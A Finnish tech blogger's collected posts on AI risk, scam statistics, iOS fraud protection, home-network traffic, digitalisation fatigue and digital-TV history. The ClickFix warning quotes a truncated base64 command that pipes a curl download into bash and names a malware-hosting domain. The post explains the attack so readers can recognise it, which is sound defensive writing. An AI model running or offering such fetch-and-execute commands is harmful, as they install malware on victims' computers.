Tekoälyn riskejä ei kannata vähätellä (HS 20.9.2026)

Mitä pitäisi ajatella kemiantehtaasta, joka tuo markkinoille uusia tuotteita ymmärtämättä itse, mitä yhdisteitä niissä on käytetty ja miten ne voivat reagoida? Tai tehtaasta, joka ei valvo päästöjään ja saa tiedon ympäristövahingosta vasta ulkopuolisten havaintojen perusteella?

Luultavasti tehtaiden toiminta keskeytettäisiin välittömästi.

Tuoreet uutiset kertovat, että suuret tekoäly-yritykset toimivat juuri näin. Julkisuudessa vaarailmoitukset kuitataan tekosyiksi tai yritysten omiksi markkinointitempauksiksi.

Tekoälyn arvaamattomuus ei ole tullut kenellekään asioita seuraavalle yllätyksenä. Kielimallit ja agentit toimivat tavalla, jota edes valmistaja itse ei pysty täysin ennakoimaan.

Keli on liukas, mutta kukaan ei halua painaa jarrua pelätessään kilpailijan pääsevän maaliin ensimmäisenä. Moni hyötyy tekoäly- ja datakeskushuumasta taloudellisesti ja vähättelee siksi varoituksia.

Isojen yritysten uusimpia tekoälymalleja pyritään rajoittamaan, mutta lähes vastaavia malleja saa muualtakin, eikä niissä ole turhia estoja. Ennen pitkää valtiot ja rikolliset valjastavat tekoälyn tarkoitukselliseen pahantekoon.

Tekoälyä ei pidä aliarvioida. Jo nyt tekoäly pystyy asioihin, joita vielä pari vuotta sitten pidettiin mahdottomina. 

Ei ole syytä olettaa, että kehitys ainakaan itsestään hidastuisi. Kun tekoälyn kyvykkyys kerran ylittää ihmisen, se pystyy kehittämään itseään ja vain kasvattamaan eroa. Ihminen pystyy hallitsemaan koiraansa, mutta koira ei pysty hallitsemaan omistajaansa.

Tekoälyllä ei ole omaa tahtoa eikä tietoisuutta. Siksi eksistentiaalinen uhka ihmiskunnan tuhoutumisesta tekoälyn vuoksi ei vielä ole hälyttävä.

Suurempi ongelma on yhteiskunnan digiriippuvuus. Tahattomasti tai varomattomuuden vuoksi hallinnasta karannut tekoäly voisi sotkea maksamisen, terveydenhuollon tai liikenteen järjestelmiä vaarallisella tavalla. Niissä on jo nykyisellään riittävästi ongelmia.

Ei kannata tuudittautua ajatukseen, että kriittiset tietojärjestelmät ovat suojassa, koska ne eivät ole netissä. Mikään järjestelmä ei ole täysin itsenäinen.

Kysykää vaikka voimaloihin ja vedenpuhdistuslaitoksiin hyökänneiltä hakkereilta. He tekivät sen jo ennen tekoälyä.

Julkaistu Helsingin Sanomien Mielipide-kirjoituksena 20.9.2026

====

Kommentti 27.9.2026:

Varoituksia tekoälyn riskeistä pidetään ylireagointina tai AI-yhtiöiden ovelana markkinointina. Tähän kallistuu myös yleensä niin varovainen ja IT-jätteihin kriittisesti suhtautuva Yle ("Piilaakson pomojen teknologiakultti").

Itse olen aidosti huolissani tekoälyn frontier-mallien riskeistä. Kaiken tapahtuneen kuittaaminen vain "teknologiakulttina" ja turhana pelotteluna on liian helppo selitys. Sekä vähättelijöillä että varoittajilla on iso taloudellinen intressi. Medialta toivoisi asiallista analyysiä kummastakin näkemyksestä.

ClickFix huijaa uhrin asentamaan haittaohjelman

Teknisten suojausten parantuessa rosvot pyrkivät huijaamaan uhria asentamaan haittaohjelman tai antamaan pääsyn pankkitililleen. Traficom varoitti vuosi sitten ClickFix-huijauksista, joissa uhria houkutellaan tekemään toimia pääsyn avaamiseksi.

Olemme tottuneet tekemään erilaisia toimenpiteitä osoittaaksemme, että emme ole robotteja. Kun tällainen huijaus ponnahtaa näytölle, reaktio tulee melkein selkäytimestä.

"Verify you are human"

Hiiren klikkaaminen Cloudflaren ikkunassa tuo näytölle varsinaisen huijauksen:

Vaaralliset komennot Terminaaliin.

Tässä vaiheessa sivu on jo lähettänyt vaaralliset komennot selaimen kautta leikepöydälle. Nyt ne pitäisi vain saada ajettua. Siksi ikkuna neuvoo avamaan Terminal-ikkunan (komentorivin) ja painamaan siellä Ctrl+V.

Kun näin tämän ensi kerran, olin juuri säätämässä Clauden ja Google Chromen yhteiskäyttöä. Se on aiemminkin vaatinut Chromen asetusten vaihtamista, ja toimii silti arvaamattomasti. Oli ihan luonnollista, että taas piti tehdä jotain loitsuja asian korjaamiseksi. Lisäksi kone oli Macbook, jossa tunnetusti ei ole haittaohjelmia (eihän?!).

Kehotus avata Terminaali kuitenkin havahdutti: nyt menee liian pitkälle! Vasta vähän myöhemmin tajusin, että tämähän oli haittaohjelma. Liikkeellä on ainakin kaksi erilaista versiota, toinen pyytää todistamaan ettei ole robotti eikä mainitse Cloudflarea, mutta idea on sama.

Mitä leikepöydältä sitten tulee? Merkkipohjainen teksti (keskeltä leikattu pala pois):

bash <<< $(echo "Y3VybCAtcyAnaHR0cH...RhdGUuc2gnIHwgYmFzaA==" | base64 -d)

Eli base64-koodattu käsky, joka purettuna hakee curl -s komennolla varsinaisen haittaohjelman murretulta palvelimelta ja putkittaa sen lopulta bashille suoritettavaksi. Tässä tapauksessa haittaohjelman haku ei kuitenkaan toiminut, eikä .vip-loppuisesta osoitteesta latautunut mitään. 

Toinen variantti lataa suoraan curl -sfL komennolla linkityksen api-logistics.com sivulle, josta varsinainen haittaohjelma haetaan.

Huijaus näyttää olevan käyttöjärjestelmäkohtainen. Kumpikaan näistä ei aktivoitunut mitenkään Windows-koneella tai älypuhelimella. Huijauksesta kuitenkin on raportoitu myös Windows-versiota, jossa ohjeen hannunvaakuna on korvattu Windows-lipulla.

On hyvä muistaa, että kun kyse on social engineering -tekniikoista, Mac-käyttäjät ovat vähintään yhtä alttiita haittaohjelmille. Ehkä jopa enemmänkin, koska kuvittelevat olevansa turvassa. Ja aina pitäisi jaksaa pysähtyä ja pohtia, mitä onkaan tekemässä, vaikka lupaikkunat ja robottien CAPTCHA-tarkastukset menevätkin ärsyttävyydessään selkäytimeen.

iPhonessa uusi suojaustoiminto pankkihuijauksia vastaan, mutta miten se toimii?

Apple julkaisi iOS 27 -version. Siinä on uusi toiminto Identiteetipetosriskien tunnistus (Impersonation Risk Detection), mutta mitähän se tarkoittaa? Kukaan ei tunnu tietävän. Juuri tämä on ärsyttävää: uusia ominaisuuksia tulee koko ajan ilman että tietäisimme, mitä niiden takana on.

Asetus löytyy kohdasta Tietosuoja ja suojaus. Oletusarvona se on pois päältä. 

"Jaa appikehittäjien kanssa"?

Puhelimen oma selitys on minimaalinen: "Sallii appien pyytää Applen identiteettipetosriskin tunnistukseen käytettäviä signaaleja, joiden avulla voidaan havaita, näkyykö laitteessasi tai tilläsi merkkejä aktiivisesta huijauksesta". Siis mitä?

Selitys ei paljon valaise.

Ilmeisesti kyse on rajapinnasta, jota ainakin pankkisovellukset voivat käyttää varoittavien merkkien tunnistamiseen. Esimerkiksi auki oleva puhelu pankkisovelluksen käytön aikana voisi olla tällainen. Sovellus saa tiedon epäilyttävästä tilanteesta ja voi itse päättää, miten reagoi siihen. 

Kiinnostavasti asetuksessa on pakollinen viive. Asetuksen kytkentä päälle tai pois ei aktivoidu heti, vaan 24 tunnin kuluessa. Näin estetään huijaria neuvomasta, miten asetus otetaan pois häiritsemästä hyvää huijausta. Siinä on suomalaisille pankeille mallia!

OP varoittaa rahansiirrosta puhelun aikana. 

Kuulostaa samalta kuin OP:n sovellus, joka näyttää maksun vahvistusnäkymässä varoituksen, mikäli rahaa yritetään siirtää puhelun aikana. Onko Apple matkinut OP:ta vai toisinpäin? Tämä on helppo ymmärtää, mutta mitä ne muut varoitussignaalit voisivat olla?

Joka tapauksessa on kiinnostavaa nähdä, alkavat suomalaiset pankit tukea asetusta omissa pankkiohjelmissaan. Seuraan tilannetta blogissani. 

Huijaukset alkuvuonna 2026: hyviä ja huonoja uutisia

Finanssialan keskusliitto on julkistanut tilastonsa alkuvuoden nettihuijauksista. Luvut eivät ole täydellisiä, mutta ne ovat vertailukelpoisia edelliseen vuoteen, joten ne kertovat muutoksesta. Alan oma järjestö esittää tilastot omalla tavallaan, tein luvuista vähän omia laskelmia. Uutiset ovat sekä hyviä että huonoja.  

Finanssialan tiedote v. 2026 ensimmäisen puoliskon huijauksista.

Hyvä uutinen on, että viime vuoden vastaavaan aikaan verrattuna huijauksissa menetettyjen rahojen määrä laski 28,3 miljoonaan (-6 %) ja estetyt huijaukset sekä palautetut rahamäärät kasvoivat 31,7 miljoonaan (+13 %). Yhteensä huijauksissa yritettiin liikuttaa siis 60 miljoonaa euroa, mikä on 3,4 % aiempaa enemmän.

Sitten ne huonot uutiset. Huijaustapausten yhteismäärä kasvoi 20 000:een, missä on peräti 47 % kasvua. Torjutut huijaukset + palautukset tapausten kpl-määrä kasvoi 41 %, mutta onnistuneiden 62 %. Tämä on huono juttu: yhä useampi huijausyritys siis onnistui. Kasvua oli tosin vain 3 prosenttiyksikköä.

Kappalemäärän kasvu ei näy tiedotteen grafiikassa, koska onnistuneiden huijausten keskimääräinen menetys laski 8100 eurosta (2025) 4700 euroon (2026). Jotain on siis tehty oikein. 

Erityisen oikein on torjuttu turvatili-huijauksia, joissa menetettiin alkuvuonna kaksi miljoonaa ja torjuttiin 1,9 miljoonaa. Viime vuoden kokonaismäärä oli 38,4 miljoonaa, josta estettiin tai pysäytettiin 23,8 miljoonaa. Elleivät turvatilihuijarit ota rajua loppukiriä näyttää siltä, että turvatileistä tehdyt varoitukset ovat tehonneet. Luultavasti myös poliisin kiinni ottamat soittohuijarit ovat vaikuttaneet tilastoihin tervehdyttävällä tavalla.

Tämä kaikki on tietenkin vain tilastointia, eikä kerro koko totuutta. Luvuista puuttuu jättimäinen 25 miljoonan euron huijaus ja toisaalta mukana on myös yritysten toimitusjohtaja- ja laskutushuijauksia. Niissä rikolliset olivat kevätkaudella täysin niskan päällä (menetetty 4,9 miljoonaa, torjuttu 0,4 miljoonaa).

Em. luvut perustuvat alan omaan tietoon tulleisiin tapauksiin. Poliisin luvut ovat erilaisia eikä kaikkia huijauksia ilmoiteta eteenpäin. Lisäksi laskentatapa herättää kysymyksen siitä, miten torjutut huijaukset lasketaan. Ovatko kaikki tapauksia, joissa uhri on mennyt lankaan, mutta pankki estänyt rahan siirron? 

Joka tapauksessa näyttää siltä, että pankkien omilla torjuntakeinoilla ja valvonnalla on ollut kasvava vaikutus. Huijarien rahat koostuvat yhä pienemmistä puroista, mutta kun kyse on kymmenistä miljoonista euroista, yrittäjiä riittää myös loppuvuodelle.

Ollaan siis tarkkoina!

Kotiverkon salattu elämä

Mitä kotisi wifi-verkossa tapahtuu? Paljonko laitteet lataavat ja lähettävät dataa kaikessa hiljaisuudessa?  Vakoillaanko sinua verkon kautta? Hyviä kysymyksiä kaikki. ETN kysyi keväällä, miten paljon puhelin jakaa öisin dataa käyttäjän nukkuessa. Osa datasiirrosta on päivityksiä, sähköpostin synkronointia ja muuta tarpeellista, mutta joukossa voi olla myös kyseenalaista dataliikennettä. Sen tunnistaminen salattujen yhteyksien sisältä on kuitenkin mahdotonta. 

Aloin selvitellä omieni puhelinteni datasiirtoa. Puhelinten omista asetuksista näkyy, miten paljon kukin sovellus on siirtänyt dataa, mutta ovatko luvut luotettavia? Androidissa ylivoimainen ykkönen oli Googlen Play (1,4 Gt kuukaudessa), sitten tulivat Meta App Manager (428 Mt/kk), Outlook (70 Mt/kk) ja Helsingin Sanomat (73 Mt/kk).

Datasiirron mittaaminen puhelimen ulkopuolelta on hankalaa. Kokeilin tehdä toisesta puhelimesta wifi-tukiaseman ja pakottaa mitattavan puhelimen vain wifi-yhteyksiin. Datamittari näytti öisin siirtyvän 20-50 megatavua, mikä tuntui paljolta.

Kotikäyttöön tarkoitetuissa wifi-reitittimissä ei yleensä ole tilastointia, korkeintaan näytetään hetkittäisen datasiirron nopeus. Vanha Google Home -purkki näytti sentään myös kumulatiiviset tulokset. 

Parhaiten tehtävään sopi Asus-reititin, jossa on Traffic Analyzer -tilastointi. Esimerkiksi vanha iPad Air 2 siirtää dataa vuorokauden ympäri, vaikkei laitetta edes käytetty. Ilmeisesti se peilaa samaan tiliin liitetyn iPhonen liikennettä. Datamäärät ovat kuitenkin pieniä, kuten NTP:n 90 saapunutta tavua.

iPad Air 2:n datasiirto on käynnissä kellon ympäri, vaikkei sitä edes käytetä.

Vanha Nokian Android-puhelin imaisi yli 300 megatavua oltuaan muutaman viikon sammutettuna. Ilmeisesti päivityksiä oli rästissä.

Datapiikki Androidissa kun puhelin käynnistetään pitkän tauon jälkeen.

Withingsin älyvaaka "soittaa kotiin" kahdesti vuorokaudessa, vaikkei sitä edes käytetty. Punnituksia tehtäessä se siirtää lukemat pilvipalveluun, joten silloin dataa siirtyy vähän enemmän.

Withings älyvaaka "soittaa kotiin" 12 tunnin välein, käytettiin sitä tai ei, mutta ei siirrä dataa muualle.

Joissakin tapauksissa dataseuranta paljastaa jopa mittauspalveluita, kuten Samsung S9 kohdalla Taboola.

Käyttäjän olisi hyvä tietää kotiverkon normaali datamäärä esimerkiksi viikoittain ja sen jakauma lähtevän ja saapuvan datan suhteen. Yllättävät piikit voivat kertoa, että jokin verkon laite tai reititin itse on valjastettu osaksi kyberhyökkäystä.

Kirjoitin syyskuun Tivi-lehden kolumnin juuri tästä aiheesta. Laitan sen verkkoon myöhemmin, nyt maksumuurin takana. Juuri tällä hetkellä kotiverkko näyttää kuukausittaisen datasiirron määräksi 288/79 gigatavua, mikä on vähän ja kertoo, ettei taloudessa juuri katsota streaming-palveluita. 

Datasiirto sai tällä viikolla uutta huomiota, kun kansainvälinen media kertoi LG:n televisioiden salakuuntelevan katsojia ja kuvaavan heidän näytöllä näkyvää sisältöä. Tältä osin oman LG-television nettiseuranta on parhaillaan käynnissä ja palaan siihen myöhemmässä kirjoituksessa.

Eikä kyse ole vain LG:n vakoilusta, vaan israelilainen yritys on myös kaapannut älytelkkareita tekoälyn avuksi. 

Lisää digiä? Ei kiitos (kolumni)

Suomalaisia pidetään digimyönteisenä kansana. Yritysten ja viranomaisten kehotuksesta olemme siirtyneet laajasti digikanaviin ja sähköiseen itsepalveluun.

Keväällä myös viranomaisposti muuttui digitaaliseksi. Jatkossa kirjeet tulevat ensisijaisesti Suomi.fi-palveluun.

Yhä vain lisää digiä olisi tulossa, mikäli digisietokyky kykenee ottamaan kaiken vastaan. Se alkaa olla koetuksella itse kullakin.

Digiä tyrkytetään, koska se säästää kustannuksia, mutta hyöty kertyy lähinnä palvelun tuottajalle. Sähköisessä itsepalvelussa käyttäjä tekee työtä, eikä hänen kustannuksiaan huomioida missään.

Toinen myyntiargumentti on asioinnin vapaus. Netissä voi maksaa laskuja tai tilata ruokaa vaikka keskellä yötä. Mutta kuinka moni oikeasti tekee niin?

Ympärivuorokautista asiointia tärkeämpää olisi palvelujen toimivuus ja helppokäyttöisyys. Niissä on yhä parantamisen varaa, vaikka asiaa on harjoiteltu jo kolmenkymmenen vuoden ajan. Logiikka hämmentää kokeneenkin käyttäjän, konekielinen suomennos huvittaa ja epäselvät virheilmoitukset ärsyttävät.

Tekniikat, alustat ja lainsäädäntö muuttuvat nopeammin kuin kehittäjät pysyvät perässä. Esimerkiksi pankit ovat panostaneet valtavasti verkkopalveluihin, mutta käyttökatkot ja häiriöt tuntuvat vain lisääntyvän.

Vibekoodaus alentaa entisestään uusien verkkopalvelujen rakentamisen kynnystä. Määrä ei edelleenkään korvaa laatua eikä nopeus suunnittelun merkitystä.

Varsinainen riesa ovat mobiilisovellukset. Sähköauton lataus, hotellit, lentoliput, pankit, kaupan bonukset, kuntosalit, pysäköinti… kaikki haluavat asentaa oman äpin, perustaa tilin ja keksiä uuden salasanan.

Äpit täyttävät puhelimen muistin ja vaativat jatkuvaa päivittämistä. Jokainen uusi sovellus on potentiaalinen tietoturvariski. Lisäksi ne tekevät puhelimen vaihtamisesta työlästä.

Ei enää yhtään uutta äppiä minun puhelimeeni, kiitos!

Itselleni oli silmiä avaava kokemus soittaa puhelimella Maanmittauslaitokselle. Sain minuutissa vastauksen ja ohjeen asiaan, jonka selvittämiseen olin käyttänyt paljon aikaani Googlessa ja viraston omilla nettisivuilla.

Joskus vanha keino on parempi kuin pussillinen digiä. Iäkkäämmät henkilöt muistavat vielä, miten jokaiseen yritykseen ja virastoon pystyi soittamaan ja sai asiansa hoidettua odottaessa.

Ilmankos iäkkäämmät eivät ole innoissaan digiajan hienouksista.

Aktiiviväestö kestää digiähkyn hammasta purren, mutta heistäkin vain harva pitää puhelimestaan. Moni kokee olevansa älypuhelimen orja ja haluaisi eroon koko vehkeestä. Puhelimen suorittama urkinta ja vakoilu huolestuttavat.

Yllättäen myös nuorten keskuudessa on kasvava uusdigitön ryhmä. He haluavat aitoja, analogisia kokemuksia: LP-levyjä, lautapelejä, jopa paperisia kirjoja parantamaan keskittymistä. Diginatiiveista tulee diginegatiiveja.

Ehkä vanhanaikaiseen puhelinpalveluun ei ole palaamista, ehkä papereita on turha haikailla takaisin. Digi on tullut jäädäkseen.

Toivotaan, että jonain päivänä tekoäly korvaa kaikenkirjavat äpit ja epäloogiset nettipalvelut. Tekemisen vaiva siirtyy ihmiseltä koneelle, jolle se kuuluukin. Asiat hoituvat yksinkertaisesti puhutuilla komennoilla.

Tulevaisuutta odotellessa on oikeus vaatia, että nykyisissä palveluissa huomioidaan myös asiakkaan etu ja hänen toiveitaan kuunnellaan. Digipakosta tulisi pyrkiä digihoukutukseen.

Esimerkiksi Suomi.fi-palveluun on toivottu tekstiviesti-ilmoitusta saapuneesta kirjeestä. Sähköposti hukkuu helposti postilaatikoihin ja filttereihin, tekstiviesti huomataan paremmin.

Pankkien e-laskut ovat näppäriä, mutta moni haluaisi ladata ne pdf-muodossa omalle levylleen arkistointia varten. Ei onnistu, koska teknisesti yksinkertainen asia vaatisi pankilta työtä ja vaivaa.

Jos digitalisaation motiivina ovat vain yksipuoliset kustannussäästöt, lopputulos ei voi olla kehuttava.

Väärillä säästöillä syntyy vain sutta ja digisekundaa – sekä ahdistuneita käyttäjiä. 

Julkaistu Tivi-lehden kolumnina 8/2026.

Lisäys: Digitaalinen itsepalvelu ja äppien tyrannia ärsyttää muitakin: Olisiko jossain vielä palvelu, jota ei tarvitse hoitaa itse? (Yle) 

Lisäys liittyen kommenteissa käytyyn keskusteluun: Nordean e-laskun tietojen vienti pdf-muotoon tuottaa yli neljän megatavun pdf-tiedoston, vaikka sama tulostettuna pdf:ksi on vain 75 kilotavua. 

Tämän pdf-tiedoston koko on yli neljä megatavua (!). 

Silmämääräisesti pdf-tiedostojen välillä ei ole mitään eroa, joten miksi pdf-vienti on kooltaan lähes 100-kertainen? Peruskäyttäjä tuskin kiinnittää huomiota asiaan, tai edes jaksaa arkistoida omia laskuja pdf-muotoon. Itse epäilen, että syynä on oikean alanurkan logo. Pdf-vienti käyttää alkuperäistä isoa logoa, joka on vain skaalattu pienemmäksi, kun taas tulostinajuri osaa pienentää sen oikeasti. Voin olla väärässäkin.

Digi-tv alkoi 25 vuotta sitten, vaikka "Big bang" jäi suutariksi

Pian vietetään suomalaisen televisiotoiminnan 25-vuotista merkkipaalua, jonka lähes kaikki alalla toimivat haluaisivat unohtaa. Antenniverkon digitaaliset tv-lähetykset käynnistyivät Suomessa ensimmäisenä maailmassa 27.8.2001 "isolla pamauksella", jota markkinoitiin näyttävästi. Asialla oli varsinkin Yle, joka otti digiveturin raskaaksi osoittautuneen roolin.

Digilähetysten alku ja tuon ajan odotukset ovat tämän päivän näkökulmasta kiinnostava ajankuva, joskin nyt ne herättävät lähinnä hilpeyttä. Itse olin tuolloin hyvin kriittinen digitalisointiprosessia kohtaan, joten en pidä toteutunutta kehitystä lainkaan yllättävänä.

Taustalla oli 1990-luvulla herännyt pelko satelliittikanavien yleistymisestä. Ne uhkasivat murentaa kotimaista tv-toimintaa, jonka voima kansalaisiin oli mahtava (vain kaksi tv-kanavaa!). Kansalliseen verkkoon haluttiin lisää kanavia ja aloittelevasta internetistä tuttua kaksisuuntaisuutta. Lisäksi haluttiin vapauttaa taajuuksia matkapuhelimille.

Nokia oli maineensa huipulla. Se oli valmistanut televisioita ja satellittien digibokseja. Suomessa päätettiin, että maamme olisi ykkönen myös television digitalisoinnissa, ja Nokialla olisi siinä iso rooli. Ylen toimitusjohtaja Arne Wessberg oli jopa Nokian hallituksessa 2001-2006 (eli juuri matkapuhelinten kulta-aikana).

Kaikki meni kuitenkin pieleen. Kun Big bang tapahtui, markkinoilla ei ollut digitaalisia vastaanottimia, joten pari ensimmäistä vuotta lähetykset menivät harakoille. Yle käynnisti kaksi uutta kanavaa, jotka ajettiin alas muutamaa vuotta myöhemmin. Yle rahoitti alun raskaat kustannukset yhtiöittämällä jakelutekniikkansa Digita Oy:ksi ja myymällä sen ulkomaille. Nokian kiinnostus televisioon lopahti, kun matkapuhelimista tuli valtava bisnes.

Yksi IIR:n monien digi-tv-seminaarien materiaalikansio.

Digi-tv:n lupaukset vuorovaikutteisista mainoksista olivat alun perinkin pöhköjä. Paluukanavaa, jonka yhteys olisi vaatinut, ei ollut. MHP osoittautui kuolleeksi. Kaikkien huomio kiintyi internetiin ja joulukuussa 2003 Suomi sai ensimmäisen laajakaistastrategian, joka pyrki tuomaan koteihin nopean nettiyhteyden. 

TV:n ikkuna tietoyhteiskuntaan oli sulkeutunut. Alkoi alamäki, jonka seuraukset näemme tänäkin päivänä. Uusintoja ja amerikkalaista halpatuotantoa, realityohjelmia.

2000-luvun alussa kävin puhumassa alan seminaareissa ja kritisoin suunnitelmia Hesarin yleisönosastossa. Oli typerää lähteä digitalisoimaan perustarkkuuden televisiota, kun HD-aika oli tulossa. Suomen pieni väestöpohja ei riittänyt maailmanlaajuiseksi edelläkävijäksi. Bugisista digisovittimista, joissa DVB-tekstitykset eivät näkyneet, tuli kansallinen murheenkryyni. 

Erääseen LVM:n alan toimijoille järjestämään tilaisuuteen kutsuin itse itseni ja livahdin sisään estelyistä huolimatta. Nykyisin vähän huvittaa.

Kevään 2001 digi-tv-seminaarin puhujat, mm. Telehallintokeskus, MTV, Ortikon interactive...

Hyvänä puolena digiuudistuksessa oli tallentavien digiboksien yleistyminen. Kun tv-ohjelma oli vain bittivirtaa, se oli helppo tallentaa kiintolevylle. Analoginen tallennus VHS-nauhureilla alkoi tuntua kivikautiselta. Onnekkaasti taulutelevisioiden läpimurto sattui juuri samaan aikaan, mikä sai monen katsojan vaihtamaan joka tapauksessa laitettaan.

Siirtymäkausi loppui 1.9.2007, kun analogiset antennilähetykset monen lykkäyksen jälkeen sammutettiin. Silloin internet oli jo vallannut niin suuren osuuden ihmisten arjesta, ettei kansallisella tv-projektilla tai maailman ykkösen asemalla ollut merkitystä. Televisiolupamaksu poistettiin vuoden 2013 alusta lähtien ja korvattiin Yle-verolla.

Jakeluverkko on vaihtunut antennista ja kaapelista laajakaistaan. Tallentavat digiboksit ovat vaihtuneet pilvipalveluiksi. Päätelaite on yhä useammin pieni puhelin, ei perinteinen televisio. HbbTV toteutti 10 vuotta myöhässä sen vuorovaikutteisuuden, mitä MHP:lle luvattiin. Joitakin vuosia sitten tv-ohjelmissa näkyi äänestyspainikkeita, mutta ilmeisesti se ei enää ottanut tulta alleen ja niistä on luovuttu. Second screen -ajattelu on hiipunut, koska live-katselu vähenee koko ajan. 

Interaktiivisia mainoksia tai mahdollisuutta tarkistaa, mistä juontaja oli ostanut mekkonsa, ei koskaan tullut. Tällaisia hienoja mahdollisuuksia visioitiin digi-tv-aikaan, ihan oikeasti. Erilaiset keskusteluikkunat, jopa TV-näytöllä (euroviisut, urheilukisat), kuitenkin toteutuivat.

Siirtymäajan televisiomaailmassa ovat paljon pidempiä kuin mihin it-alalla on totuttu. SD-aika ("suttupiirto") loppui 1.4.2025, kun Yle lopetti viimeisetkin perustarkkuuden lähetykset. Toinen digisiirtymä tapahtui siis lähes 18 vuotta ensimmäisen jälkeen. Viimeisetkin kaupalliset kanavat tekivät saman 30.6.2025. Ilmeisesti 4K-siirtymää ei edes tule, televisio on kehittynyt valmiiksi.

Digi-tv:n alkuvuosien historiikki 1997-2007 on vielä kirjoittamatta. Ehkä neljännesvuosisata myöhemmin olisi kulunut riittävästi aikaa. Kirjoittaja voi aloittaa vaikka omasta Kodin digitekniikka -kirjastani (Docendo 2007), jossa tapahtumia on dokumentoitu yhdestä näkökulmasta. 

Ainoa tapaamani kriittinen kirjallinen viittaus noihin aikoihin on Iltalehden entisen päätoimittajan muistelmissa (Kari Kivelä: Punkkari ja mediapomo, Otava 2025). Joku muukin voisi palata noihin vuosiin ja niissä maksettuihin oppirahoihin. Sieltä löytyvät syyt tv-median nykyiseen tilaan. Kotimaiset toimet ehkä jouduttivat kehitystä ja tulivat kansalaisille kalliiksi, mutta kehitys itsessään oli väistämätön.